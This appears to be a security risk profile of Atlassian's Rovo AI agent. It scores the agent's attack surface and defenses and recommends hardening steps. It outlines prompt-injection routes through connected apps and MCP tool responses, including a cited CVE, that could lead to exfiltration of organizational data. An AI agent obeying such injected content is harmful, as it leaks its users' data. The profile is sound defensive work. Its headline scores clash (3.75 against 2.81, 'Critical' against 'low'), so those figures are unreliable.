Atlassian Rovo Agent Security Risks

Work Copilot Agents atlassian.com Tight Operators
AI RISK QUADRANT POSITION DEFENSE CONTROLS (7) ATTACK SURFACE (4.8) EXPOSED GIANTS FORTIFIED LEADERS HUMBLE PROVIDERS TIGHT OPERATORS
AIRQ Score
3.75
Critical
Attack Surface
4.8
Medium
Blast Radius
3.75
Medium
Defense Controls
7
Medium
About The Agent

Atlassian Rovo is a cloud-hosted AI work copilot embedded within the Atlassian Cloud platform, operating as a SaaS agent across Jira, Confluence, and connected third-party services via Model Context Protocol servers. It ingests organizational content from multiple untrusted sources, executes scoped API skills on behalf of the invoking user, and stores persistent cross-session memory via the Teamwork Graph. The primary risk surface spans untrusted input from connected apps and MCP tools, access to sensitive organizational data, and external egress to LLM providers and MCP endpoints without output-layer DLP.

About the AI Risk Quadrant

Tight Operators describes agents with moderate attack surface and limited blast radius offset by meaningful vendor controls. Rovo lands here with X 4.80 (driven by external data ingestion, persistent memory, inter-agent MCP connectivity, and open configuration), Y 3.75 (constrained by the absence of code execution and deployment access), and Z 7 (permission scoping, execution isolation, and audit logging present but no output-layer DLP). Operators inherit a manageable blast radius but must independently close the egress-layer gap the vendor leaves open.

1 Key Risks

The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Rovo exposes all three trifecta conditions on its default configuration with no output-layer DLP and limited visibility into per-agent reasoning activity.

Key Input Risks
Rovo ingests content from Confluence pages, Jira issues, connected third-party applications, and MCP server tool responses without independent content-injection filtering on the default configuration. CVE-2026-27826 demonstrated that attacker-controlled tool responses from the mcp-atlassian ecosystem server reach the reasoning loop directly.
Key Execution Risks
Rovo executes skills via scoped API calls to Atlassian products and connected services rather than arbitrary code; no public red-team results validate the execution boundary. Vendor documentation references cloud isolation but publishes no named sandbox specification for general skill execution.
Key Action Risks
Automation rules in Rovo Studio invoke agents asynchronously on triggers and schedules without per-action operator approval for each firing within a triggered flow. The agent inherits the full permission scope of the invoking user including write access to Jira issues and Confluence pages.
Key Output Risks
Rovo emits text responses, creates Jira issues, edits Confluence pages, and writes to connected integrations without documented DLP or credential-redaction controls on the default configuration. Responses containing sensitive organizational data flow directly to the requesting user's chat interface without output filtering.
Key Monitoring Risks
Atlassian provides SOC 2 certified structured audit logs with organization-level SIEM-compatible event forwarding for platform actions. Per-agent reasoning traces and prompt-level anomaly detection are not documented as operator-accessible, leaving real-time injection detection as an operator blind spot.

2 AIRQ Scores

The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Rovo's AIRQ composite of 2.81 reflects a constrained-blast agent whose defense controls partially offset a moderate attack surface.

AIRQ Metrics

Rovo occupies the Tight Operators quadrant with attack surface 4.80, blast radius 3.75, and defense controls 7 out of their respective denominators.

Scores are expressed against axis maximums: attack surface out of 10, blast radius out of 10, defense controls out of 15, and AIRQ composite out of 15.

Metric Score Comments
AIRQ Score 3.75 Low composite indicates constrained overall risk but does not eliminate the need for egress-layer hardening.
Blast Radius 3.75 / 10 Limited by absence of code execution and deployment access; network and credential scopes are the primary blast factors.
Attack Surface 4.8 / 10 External data ingestion, persistent memory, inter-agent MCP surface, and open configuration drive the score; trifecta-complete is met.
Defense Controls 7 / 15 Vendor publishes permission scoping, execution isolation, and audit logging but documents no output-layer DLP or content-exfiltration controls.

3 Attack Surface

Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. Rovo's reasoning loop ingests user prompts, Confluence and Jira content, connected third-party application data, and MCP server tool responses as first-class input.

Attack Surface Metrics

Higher scores indicate surfaces where untrusted content reaches the reasoning loop with minimal validation, peaking at external data, memory, inter-agent, and configuration.

Each row maps a named attack surface to its assessed score and a one-sentence comment identifying the specific exposure vector.

Surface Score Comments
User Input 2 / 4 Chat prompts and slash commands are the primary user-input channel with an instruction hierarchy separating system and user tiers [8].
External Data 3 / 4 Third-party connectors sync content from Confluence, Jira, and external applications into the reasoning loop without per-document injection filtering [6].
Memory 3 / 4 Persistent cross-session memory stores preferences and organizational knowledge via the Teamwork Graph without documented integrity verification [13].
Reasoning 2 / 4 Multi-model architecture routes to OpenAI and Anthropic providers with visible chain-of-thought but no published independent reasoning-loop audit [5].
Planning 2 / 4 Multi-step skill plans are visible before execution with confirmation gates for destructive operations on the default configuration [8].
Tool Execution 2 / 4 Skills execute scoped API calls within Atlassian products and connected services with no arbitrary code execution exposed to end users [8].
Orchestration 2 / 4 Rovo Studio automation rules invoke agents on triggers within a single user permission scope without cross-agent escalation [12].
Inter-Agent 3 / 4 MCP server connectivity extends the agent to external tool providers without inter-agent authentication; CVE-2026-27826 demonstrated injection via the ecosystem server [1][2][3].
Output Processing 2 / 4 Responses render in the Atlassian UI with permission-scoped visibility but no documented URL sanitization or exfiltration blocking [5].
Configuration 3 / 4 Admins enable MCP servers and marketplace agents; any licensed user can create custom Rovo agents by default without additional approval [11].

The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Rovo accepts content from connected applications and MCP tool responses, operates over organizational data in Jira and Confluence, and transmits context to external LLM providers and MCP endpoints.

Lethal Trifecta · Complete (3 of 3)

Atlassian Rovo exhibits all three of these conditions in its documented default configuration:

  • Untrusted input — Connected third-party apps and MCP server tool responses feed attacker-controllable content into the reasoning loop without per-document filtering [6][11].
  • Sensitive data — The agent operates with the invoking user's full permission scope across Jira issues, Confluence pages, and OAuth-scoped integrations [7].
  • External egress — Prompt context flows to third-party LLM providers and outbound MCP skill invocations reach external endpoints [5][11].

4 Blast Radius

The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A compromised Rovo session reaches the invoking user's Jira and Confluence content, connected OAuth integrations, and triggered automation flows but not code execution or deployment infrastructure.

Blast Radius Metrics

Higher blast scores indicate factors where a compromised agent session can reach sensitive resources beyond the immediate chat interaction.

Each row maps a blast-radius factor to its score and identifies the specific workflow boundary or OAuth scope that defines the exposure.

Factor Score Comments
Code execution 1 / 4 No shell, sandbox, or arbitrary code execution is exposed to end users; all operations are API-call-based skills [8].
File system access 1 / 4 Read-only access scoped to Confluence pages and Jira attachments within the invoking user's permission boundary [7].
Network access 2 / 4 Outbound connections are domain-restricted to Atlassian services, configured MCP servers, and LLM provider endpoints [5].
Credential access 2 / 4 The agent inherits OAuth scopes from connected integrations via the invoking user's permission set without per-action credential gating [7].
Autonomous action 2 / 4 Automation rules in Rovo Studio fire on triggers and schedules; individual skill invocations within a triggered flow skip per-action confirmation [12].
Deployment access 1 / 4 Rovo creates and modifies Jira issues and Confluence pages but has no documented access to infrastructure deployment or production environments [8].

5 Defense Controls

Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Atlassian publishes permission scoping, cloud execution isolation, and SOC 2 certified audit logging while leaving output-layer DLP entirely to the operator.

Defense Controls Metrics

Higher defense scores indicate stronger vendor-implemented safeguards that reduce the operator's residual hardening burden on the default configuration.

Each component is scored on what the vendor implements and documents versus what falls to the operator to configure or build externally.

Component Score Comments
Input Guardrails 1 / 3 Vendor claims content-as-data treatment but publishes no independent red-team validation or pattern-based injection filter specification [4].
Execution Isolation 2 / 3 Cloud-hosted multi-tenant isolation with permission-scoped execution; vendor references internal Firecracker microVM usage but publishes no general isolation specification [9].
Action Controls 2 / 3 Default configuration requires user confirmation for destructive skills; admin-configurable policies restrict agent creation and MCP server enablement [7].
Output Guardrails 0 / 3 No DLP, credential redaction, or exfiltration-blocking mechanism is documented for agent output on the default configuration [6].
Monitoring 2 / 3 SOC 2 and ISO 27001 certified platform with structured audit logs and organization-level SIEM-compatible event forwarding [10][14].

6 Hardening Tips

Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize closing the egress-layer gap and restricting MCP server connectivity to break the trifecta on the default configuration.

Input Guardrails

Input guardrails intercept adversarial content before it reaches the reasoning loop.

Input Guardrails
  • Policy Require security review of all third-party MCP server connections before admin enablement in production workspaces.
  • Configuration Restrict the approved MCP server list to vendor-vetted entries only via the admin-managed allowlist in Rovo settings.
  • Engineering Deploy a prompt-injection classifier on content from connected third-party apps before it enters the Rovo reasoning context.

Execution Isolation

Execution isolation contains what a compromised agent can do on the host.

Execution Isolation
  • Policy Mandate that Rovo agents in production workspaces operate under service accounts with least-privilege scopes.
  • Configuration Disable Rovo agent creation for non-admin users via the organization-level governance controls in the admin console.
  • Engineering Instrument API-call boundaries to log every skill invocation with the full request payload for post-incident forensics.

Action Controls

Action controls govern which tools and actions the agent can invoke autonomously.

Action Controls
  • Policy Require explicit approval workflows for automation rules that modify data across multiple products or connected integrations.
  • Configuration Enable mandatory confirmation gates for all write operations in Rovo Studio automation rules regardless of trigger type.
  • Engineering Build a webhook-based approval gateway that intercepts high-blast-radius skill invocations and requires out-of-band confirmation.

Output Guardrails

Output guardrails inspect what the agent sends to other systems and users.

Output Guardrails
  • Policy Establish a data classification policy identifying content categories that must never appear in agent responses to standard users.
  • Configuration Configure Atlassian Guard to monitor and alert on agent responses containing credential formats or sensitive data markers.
  • Engineering Deploy a DLP proxy between the response pipeline and the user-facing chat interface to redact sensitive content patterns.

Monitoring

Monitoring captures what the agent did and surfaces anomalies for review.

Monitoring
  • Policy Define a retention and review cadence for Rovo audit logs including weekly automated anomaly scans for unusual skill invocations.
  • Configuration Forward organization audit logs to an external SIEM with alert rules for high-volume agent activity and unusual MCP server access.
  • Engineering Build a custom audit dashboard correlating Rovo agent activity with downstream system changes to detect multi-step attack chains.

7 References

The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.

Selected Vulnerabilities

  1. CVE-2026-27826 SSRF in mcp-atlassian MCP server enabling outbound requests to attacker-controlled URLs and LLM tool-result injection; patched 0.17.0
  2. GHSA-7r34-79r5-rcc9 GitHub advisory for unauthenticated SSRF via unvalidated header URLs in mcp-atlassian community MCP server middleware

Selected Research

  1. MCP Atlassian SSRF analysis Independent advisory analyzing chained SSRF-to-prompt-injection path through mcp-atlassian into downstream LLM context
  2. Can Rovo Be Tricked by Malicious Files? Atlassian community discussion documenting vendor claims about prompt-injection resistance and content-as-data treatment

Vendor Documentation

  1. Atlassian AI Trust Center Primary trust page documenting LLM provider data handling and SOC 2 plus ISO 27001 compliance scope
  2. Rovo data privacy and usage guidelines Support documentation covering third-party connector data sync and model provider relationships
  3. Rovo agent permissions and governance Documents permission-scoped execution model and admin controls for agent creation restriction
  4. Rovo Chat capabilities Documents default skills requiring user confirmation and the skill-based action model
  5. Rovo AI Security Vendor security page covering encryption claims and admin controls for data protection
  6. Rovo data usage and privacy admin guide Admin guide documenting audit log access and LLM provider non-training commitment

Other Sources

  1. Rovo MCP gallery Announcement documenting open MCP standard connectivity extending agent reach to third-party services
  2. Rovo Studio announcement Documents Rovo Studio multi-agent automation capabilities and enterprise governance controls
  3. Rovo Chat persistent memory updates Documents three-layer persistent memory architecture including Teamwork Graph integration
  4. Atlassian security practices Platform security documentation covering SIEM aggregation and automated alert rules